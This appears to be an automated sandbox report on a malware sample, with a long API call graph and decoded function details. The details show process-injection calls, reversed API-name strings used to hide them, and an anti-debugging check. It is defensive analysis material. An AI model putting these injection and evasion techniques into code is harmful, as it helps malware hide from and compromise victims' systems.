GetModuleHandleA GetProcAddress 26073->26076 26077 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26074->26077 26082 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26075->26082 26096 2bb9312 26076->26096 26080 2bb423f 26077->26080 26097 2bb9060 26078->26097 26081 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26079->26081 26083 2bb4260 26080->26083 26099 2bb826d 26081->26099 26085 2bb9807 26082->26085 26094 2bb4278 26083->26094 26090 2bb5f27 26084->26090 26089 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26085->26089 26087 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26086->26087 26112 2bb76d4 26087->26112 26091 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26088->26091 26093 2bb983a 26089->26093 26092 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26090->26092 26114 2bb6191 26091->26114 26095 2bb5f33 26092->26095 26100 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26093->26100 26102 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26094->26102 26106 2bb5f5f 26095->26106 26101 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26096->26101 26098 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26097->26098 26124 2bb90dc 26098->26124 26103 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26099->26103 26107 2bb986d 26100->26107 26123 2bb938e 26101->26123 26104 2bb42bb 26102->26104 26105 2bb82e9 26103->26105 26109 2bb42dc 26104->26109 26108 2ba8584 GetModuleHandleA GetProcAddress 26105->26108 26129 2bb8309 26105->26129 26111 2bb5f96 26106->26111 26110 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26107->26110 26108->26129 26116 2bb42f4 26109->26116 26118 2bb98a0 26110->26118 26117 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26111->26117 26113 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26112->26113 26137 2bb7750 26113->26137 26115 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26114->26115 26141 2bb620d 26115->26141 26119 2bb431e 26116->26119 26120 2bb5faf 26117->26120 26121 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26118->26121 26122 2bb432b 26119->26122 26128 2bb5fd0 26120->26128 26144 2bb98d3 26121->26144 26126 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26122->26126 26125 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26123->26125 26127 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26124->26127 26130 2bb940a 26125->26130 26131 2bb4337 26126->26131 26146 2bb9158 26127->26146 26138 2bb6007 26128->26138 26132 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26129->26132 26135 2ba8bb0 7 API calls 26130->26135 26133 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26131->26133 26148 2bb8385 26132->26148 26134 2bb433c 26133->26134 26136 2bb435d 26134->26136 26135->25946 26149 2bb4368 26136->26149 26139 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26137->26139 26140 2bb601f 26138->26140 26155 2bb77cc 26139->26155 26142 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26140->26142 26143 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26141->26143 26153 2bb602b 26142->26153 26158 2bb6289 26143->26158 26145 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26144->26145 26162 2bb994f 26145->26162 26147 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26146->26147 26147->26150 26151 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26148->26151 26152 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26149->26152 26150->26052 26165 2bb8401 26151->26165 26154 2bb43b8 26152->26154 26153->26065 26164 2bb43f1 26154->26164 26156 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26155->26156 26157 2bb7848 26156->26157 26159 2baaf58 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26157->26159 26160 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26158->26160 26161 2bb7859 26159->26161 26171 2bb6305 26160->26171 26161->24983 26163 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26162->26163 26167 2bb99cb 26163->26167 26168 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26164->26168 26166 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26165->26166 26174 2bb847d 26166->26174 26169 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26167->26169 26170 2bb4434 26168->26170 26176 2bb99fe 26169->26176 26173 2bb4487 26170->26173 26172 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26171->26172 26181 2bb6381 26172->26181 26175 2bb44df 26173->26175 26177 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26174->26177 26179 2bb44ea 26175->26179 26178 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26176->26178 26189 2bb8504 26177->26189 26190 2bb9a7a 26178->26190 26180 2bb44f7 26179->26180 26182 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26180->26182 26183 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26181->26183 26184 2bb4503 26182->26184 26195 2bb63fd 26183->26195 26185 2bb4524 26184->26185 26186 2bb452f 26185->26186 26187 2bb453c 26186->26187 26188 2bb455b 26187->26188 26193 2bb4566 26188->26193 26191 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26189->26191 26192 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26190->26192 26205 2bb8580 26191->26205 26206 2bb9af6 26192->26206 26194 2bb4573 26193->26194 26196 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26194->26196 26199 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26195->26199 26197 2bb457f 26196->26197 26198 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26197->26198 26210 2bb4584 26198->26210 26222 2bb6498 26199->26222 26200 2bb458e 26201 2bb45ed 26200->26201 26202 2bb4592 26200->26202 26204 2bb460e 26201->26204 26203 2bb45a7 26202->26203 26209 2bb45b8 26203->26209 26212 2bb4619 26204->26212 26207 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26205->26207 26208 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26206->26208 26217 2bb85fc 26207->26217 26211 2bb9b72 26208->26211 26209->26210 26210->26200 26213 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26211->26213 26214 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26212->26214 26215 2bb9ba5 26213->26215 26218 2bb4669 26214->26218 26216 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26215->26216 26220 2bb9bd8 26216->26220 26219 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26217->26219 26221 2bb4695 26218->26221 26231 2bb8683 26219->26231 26223 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26220->26223 26224 2bb46cc 26221->26224 26225 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26222->26225 26226 2bb9c0b 26223->26226 26227 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26224->26227 26234 2bb6593 26225->26234 26229 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26226->26229 26228 2bb46e5 26227->26228 26230 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26228->26230 26237 2bb9c3e 26229->26237 26232 2bb46ea 26230->26232 26233 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26231->26233 26235 2bb473d 26232->26235 26240 2bb86ff 26233->26240 26236 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26234->26236 26239 2bb4776 26235->26239 26248 2bb660f 26236->26248 26238 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26237->26238 26245 2bb9cba 26238->26245 26242 2bb47ad 26239->26242 26241 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26240->26241 26252 2bb877b 26241->26252 26243 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26242->26243 26244 2bb47b9 26243->26244 26247 2bb47e5 26244->26247 26246 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26245->26246 26250 2bb9d36 26246->26250 26249 2bb481c 26247->26249 26251 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26248->26251 26255 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26249->26255 26253 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26250->26253 26263 2bb66c7 26251->26263 26254 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26252->26254 26258 2bb9d69 26253->26258 26266 2bb87f7 26254->26266 26256 2bb4835 26255->26256 26257 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26256->26257 26262 2bb483a 26257->26262 26259 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26258->26259 26261 2bb9d9c 26259->26261 26260 2bb4848 26260->26262 26264 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26261->26264 26262->26260 26271 2bb48dc 26262->26271 26265 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26263->26265 26268 2bb9dcf 26264->26268 26265->26269 26267 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26266->26267 26276 2bb8873 26267->26276 26270 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26268->26270 26269->24983 26269->25758 26273 2bb9e02 26270->26273 26272 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26271->26272 26275 2bb491f 26272->26275 26274 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26273->26274 26282 2bb9e35 26274->26282 26278 2bb4958 26275->26278 26277 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26276->26277 26286 2bb88ef 26277->26286 26279 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26278->26279 26280 2bb499b 26279->26280 26281 2ba870c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26280->26281 26283 2bb49a0 26281->26283 26284 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26282->26284 26285 2ba8410 GetModuleHandleA GetProcAddress WinExec 26283->26285 26297 2bb9eb1 26284->26297 26289 2bb49b2 26285->26289 26287 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26286->26287 26288 2bb896b 26287->26288 26290 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26288->26290 26294 2bb49e8 26289->26294 26291 2bb898a 26290->26291 26292 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26291->26292 26293 2bb899e 26292->26293 26295 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26293->26295 26303 2bb4a1f 26294->26303 26296 2bb89b2 26295->26296 26298 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26296->26298 26299 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26297->26299 26300 2bb89c6 26298->26300 26308 2bb9f2d 26299->26308 26301 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26300->26301 26302 2bb89da 26301->26302 26304 2ba87a0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26302->26304 26305 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26303->26305 26311 2bb89ee 26304->26311 26306 2bb4a38 26305->26306 26307 2bb4a59 26306->26307 26310 2bb4a90 26307->26310 26309 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26308->26309 26316 2bb9fa9 26309->26316 26312 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26310->26312 26313 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26311->26313 26314 2bb4ab4 26312->26314 26320 2bb8a75 26313->26320 26315 2bb4aed 26314->26315 26318 2bb4b24 26315->26318 26317 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26316->26317 26324 2bba025 26317->26324 26319 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26318->26319 26321 2bb4b30 26319->26321 26322 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26320->26322 26323 2bb4b4b 26321->26323 26322->25889 26329 2bb4ba0 26323->26329 26325 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26324->26325 26326 2bba0a1 26325->26326 26327 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26326->26327 26328 2bba0b0 26327->26328 26330 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26328->26330 26336 2bb4bbc 26329->26336 26331 2bba0bf 26330->26331 26332 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26331->26332 26333 2bba0ce 26332->26333 26334 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26333->26334 26335 2bba0dd 26334->26335 26337 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26335->26337 26342 2bb4c0c 26336->26342 26338 2bba0ec 26337->26338 26339 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26338->26339 26340 2bba0fb 26339->26340 26341 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26340->26341 26343 2bba10a 26341->26343 26350 2bb4c29 26342->26350 26344 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26343->26344 26345 2bba119 26344->26345 26346 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26345->26346 26347 2bba128 26346->26347 26348 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26347->26348 26349 2bba137 26348->26349 26351 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26349->26351 26357 2bb4c4b 26350->26357 26352 2bba146 26351->26352 26353 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26352->26353 26354 2bba155 26353->26354 26355 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26354->26355 26356 2bba164 26355->26356 26358 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26356->26358 26357->26360 26359 2bba173 26358->26359 26361 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26359->26361 26360->25597 26362 2bba182 26361->26362 26363 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26362->26363 26364 2bba1fe 26363->26364 26365 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26364->26365 26366 2bba231 26365->26366 26367 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26366->26367 26368 2bba264 26367->26368 26369 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26368->26369 26370 2bba297 26369->26370 26371 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26370->26371 26372 2bba2ca 26371->26372 26373 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26372->26373 26374 2bba2fd 26373->26374 26375 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26374->26375 26376 2bba330 26375->26376 26377 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26376->26377 26378 2bba363 26377->26378 26379 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26378->26379 26380 2bba3df 26379->26380 26381 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26380->26381 26382 2bba45b 26381->26382 26383 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26382->26383 26384 2bba4d7 26383->26384 26385 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26384->26385 26386 2bba50a 26385->26386 26387 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26386->26387 26388 2bba53d 26387->26388 26389 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26388->26389 26390 2bba570 26389->26390 26391 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26390->26391 26392 2bba5a3 26391->26392 26393 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26392->26393 26394 2bba5d6 26393->26394 26395 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26394->26395 26396 2bba609 26395->26396 26397 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26396->26397 26398 2bba63c 26397->26398 26399 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26398->26399 26400 2bba66f 26399->26400 26401 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26400->26401 26402 2bba6a2 26401->26402 26403 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26402->26403 26404 2bba6d5 26403->26404 26405 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26404->26405 26406 2bba708 26405->26406 26407 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26406->26407 26408 2bba73b 26407->26408 26409 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26408->26409 26410 2bba76e 26409->26410 26411 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26410->26411 26412 2bba7a1 26411->26412 26413 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26412->26413 26414 2bba7d4 26413->26414 26415 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26414->26415 26416 2bba807 26415->26416 26417 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26416->26417 26418 2bba83a 26417->26418 26419 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26418->26419 26420 2bba86d 26419->26420 26421 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26420->26421 26422 2bba8a0 26421->26422 26423 2ba818c GetModuleHandleA GetProcAddress FlushInstructionCache 26422->26423 26424 2bba8af 26423->26424 26425 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26424->26425 26426 2bba92b 26425->26426 26427 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26426->26427 26428 2bba9a7 26427->26428 26429 2ba8824 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26428->26429 26429->25013 26431 2ba871a 26430->26431 26451 2ba80c8 26431->26451 26433 2ba8745 26455 2ba7d00 26433->26455 26435 2ba8773 26435->24987 26437 2ba8838 26436->26437 26438 2ba8020 2 API calls 26437->26438 26439 2ba886d 26438->26439 26440 2ba80c8 GetProcAddress 26439->26440 26441 2ba8886 26440->26441 26442 2ba7d00 3 API calls 26441->26442 26443 2ba88e5 26442->26443 26443->24991 26446 2baec05 26444->26446 26445 2baec32 26445->25016 26446->26445 26447 2baec20 CheckRemoteDebuggerPresent 26446->26447 26447->26445 26449 2b946aa 26448->26449 26450->25496 26452 2ba80ed 26451->26452 26453 2ba8120 GetProcAddress 26452->26453 26454 2ba814f 26453->26454 26454->26433 26456 2ba7d25 26455->26456 26462 2ba8020 26456->26462 26458 2ba7d55 26459 2ba80c8 GetProcAddress 26458->26459 26460 2ba7d5b NtWriteVirtualMemory 26459->26460 26461 2ba7d94 26460->26461 26461->26435 26463 2ba8043 26462->26463 26464 2ba80c8 GetProcAddress 26463->26464 26465 2ba8069 GetModuleHandleA 26464->26465 26466 2ba808f 26465->26466 26466->26458

                                                                                                                                      Executed Functions

                                                                                                                                      Function 02BA79B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BA7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 421316089-445027087
                                                                                                                                      • Opcode ID: 7f4ce699b978f234ab46a98c3c3ffbf5efab4e60fd9e4b4e685c002828e7361f
                                                                                                                                      • Instruction ID: 3f34f69441078dbc084a05b6e4bf8f08a784129994b52d7a1ba156f48142239e
                                                                                                                                      • Opcode Fuzzy Hash: 7f4ce699b978f234ab46a98c3c3ffbf5efab4e60fd9e4b4e685c002828e7361f
                                                                                                                                      • Instruction Fuzzy Hash: 72116175618208BFEB00EFA4DC51E9EB7BDEB4C700F5188A1F605D7640DA30AA118B20
                                                                                                                                      Function 02BA79B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BA7A27
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                      • API String ID: 421316089-445027087
                                                                                                                                      • Opcode ID: a7d730025fbdb795187bd3c966dbfa4411728377d506afb99946ecc2005b4427
                                                                                                                                      • Instruction ID: 8789199959a0e310fdd7c0d80c03df6b84800b085883bb61155c40a4a0eccd7a
                                                                                                                                      • Opcode Fuzzy Hash: a7d730025fbdb795187bd3c966dbfa4411728377d506afb99946ecc2005b4427
                                                                                                                                      • Instruction Fuzzy Hash: 68118075618208BFEB00EFA4DC51F9EB7BDEB4C700F5188A1F605E7640DA30AA118B20
                                                                                                                                      Function 02BA8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BA82C5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                      • API String ID: 2004920654-737317276
                                                                                                                                      • Opcode ID: 5ad1e9089783403c47ec60bcf117f084e17541d22301215ce3451729454095d8
                                                                                                                                      • Instruction ID: 649c06152a124f50e3ab9fe9bce174c39b669520b107272c93d82e667562795a
                                                                                                                                      • Opcode Fuzzy Hash: 5ad1e9089783403c47ec60bcf117f084e17541d22301215ce3451729454095d8
                                                                                                                                      • Instruction Fuzzy Hash: 70014075654208BFEF40EFA8D851E5E77FEEB4D700F5188A1F604D7A00D630A9118B24
                                                                                                                                      Function 02BA7D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BA7D74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                      • API String ID: 4260932595-3542721025
                                                                                                                                      • Opcode ID: aa74e6317e04218b687dc967bfe8bdd0d3d2c39335963b154b0247c9e5e38ab1
                                                                                                                                      • Instruction ID: e611818d610cb29055b083b4ecdbc2a741fd0542395b11bf80997878a5df0552
                                                                                                                                      • Opcode Fuzzy Hash: aa74e6317e04218b687dc967bfe8bdd0d3d2c39335963b154b0247c9e5e38ab1
                                                                                                                                      • Instruction Fuzzy Hash: 120156B5618204BFDB40EFA8DC51E9EB7FDEB4D700F5188A1F504D7A40DA30A9119F24
                                                                                                                                      Function 02BA84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(?,?), ref: 02BA8529
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                                      • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                      • API String ID: 2801472262-2520021413
                                                                                                                                      • Opcode ID: 8c2a5c31913a600f359f8d6bbcb0bed1d8f2db6f9eee8246b4e7f11949545050
                                                                                                                                      • Instruction ID: 7488d60942ec1a8ac07c0017bda83277f8fd0eb5edce0900d4b46c800760be91
                                                                                                                                      • Opcode Fuzzy Hash: 8c2a5c31913a600f359f8d6bbcb0bed1d8f2db6f9eee8246b4e7f11949545050
                                                                                                                                      • Instruction Fuzzy Hash: 13016274A58204BFEB50EFA8D861E5E77BEEB49710F518CE1F504D7A11DA34A9118A20
                                                                                                                                      Function 02BA85DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BA8668
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                      • API String ID: 4105707577-2353454454
                                                                                                                                      • Opcode ID: e3c9dbfeac82c52c2aff80b6893176ea72759ae667997593a4ae06552fefa682
                                                                                                                                      • Instruction ID: f0544dd4e8147e4e9db5648a6be00a9fba03ac553e2a33591fca21aa7f36d203
